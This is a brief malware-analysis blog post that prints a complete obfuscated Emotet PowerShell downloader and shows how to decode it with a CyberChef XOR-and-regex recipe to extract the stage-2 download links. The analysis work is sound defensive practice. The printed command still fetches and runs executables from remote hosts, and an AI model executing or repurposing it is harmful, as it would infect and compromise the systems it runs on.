June 2018, Emotet encoding observed and decoded

Nothing earth shattering to report here, I just wanted to share the latest Emotet encoded powershell command and one simple way to decode it to extract the Stage 2 download links.

I know, a lot of these obfuscated powershells can be easily decoded by simply using the write-host command, however, I do like to try different ways to reverse the obfuscation, as I think it just makes for a good analyst exercise.

The powershell command is encoded as:

POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68>70J4!102!106O25I77t121O30>106O4J107V67J95O95-91!17I4>4t92t92-92J5!71-66>74H74-88!88>68I72x66I74I95H78t5x72I68t70!4I98-94!24V90I67H77!104H4>107H67x95I95>91!17I4I4I95H78>88!95>5!79O66O89O64!95x94I66H91x5t69-71>4-126O18V83O104I120x4H107J67J95V95V91V17!4>4!92I92I92>5J65I83V88V95>94-79t66I68V5x89>94J4t66I92J79V114>105>4>12!5!120H91H71t66I95J3O12H107t12x2t16-15I66H91J74J92O89I11t22O11>15I77t81V95I124>96J92>5!69V78t83H95J3!26!7t11V26>27H24I19V30V25-2V16-15x102V105>77t113-108!11>22t11!15I78t69-93I17H95!78O70H91I11I0t11J12I119x12>11-0I11H15t66I91!74H92>89J11J0V11>12O5!78J83-78t12!16I77t68-89-78x74V72t67-3J15x65V120H69x123I72t11J66!69x11V15-97O88t94I74J66J2x80H95t89H82J80J15>92!64O89!122x114!5I111x68t92V69-71I68!74O79-109I66I71!78V3O15x65J120t69>123!72t5x127O68H120t95J89!66>69H76V3I2x7t11!15t102J105H77O113H108!2-16I120I95I74-89x95>6>123!89H68-72I78t88t88t11H15V102J105V77>113H108-16I73t89I78J74O64x16J86I72H74!95J72V67J80t92!89I66V95I78!6I67I68O88-95-11H15-116>5H110V83I72-78>91O95>66>68I69-5J102H78t88J88!74!76x78-16J86>86' -SplIT '>' -spLiT'X' -SpLiT '!'-sPlIt 'V' -SplIt'o' -SPLiT'i'-sPliT 'H'-SpLIT'-'-sPlit't'-sPLIt'J' |forEaCh{ [CHaR] ( $_-bXOr'0x2b' ) })+" $(SEt 'OfS' ' ') " )


There are a couple quick things to note here which make reversing this pretty simple to understand. First, notice the -Split commands, these are setting delimiters, and then notice the -bXOr '0x2b' command, this tells us that the command is encoded with XOR key 0x2b.

 There are a lot of ways to handle this, such as using the Linux TR command and other commands to strip out the punctuation and alpha characters, convert the decimal values and then apply the XOR key. However, I think it's worth pointing out the CyberChef tool to do this instead.

Here is a custom recipe I used in CyberChef to decode this:


Find_/_Replace({'option':'Regex','string':'[^\\w\\s]|[a-zA-Z]'},' ',true,false,true) From_Decimal('Space') XOR({'option':'Hex','string':'2b'},'Standard',true) Regular_expression('User defined','(https?\\x3a\\x2f\\x2f[wW]*\\.?[a-zA-Z0-9]+\\x2d?[a-zA-Z0-9]*\\x2e[a-zA-Z]+\\x2e?\\w*\\x2e?\\w*\\x2e?\\x2f[a-zA-Z0-9]+\\x2f)',true,true,false,true,false,false,'Highlight matches')

When applied, I get my stage2 download links:>





If anyone has any improvements on the last bit of RegEx in the recipe let me know, it doesn't always catch all the links.

Comments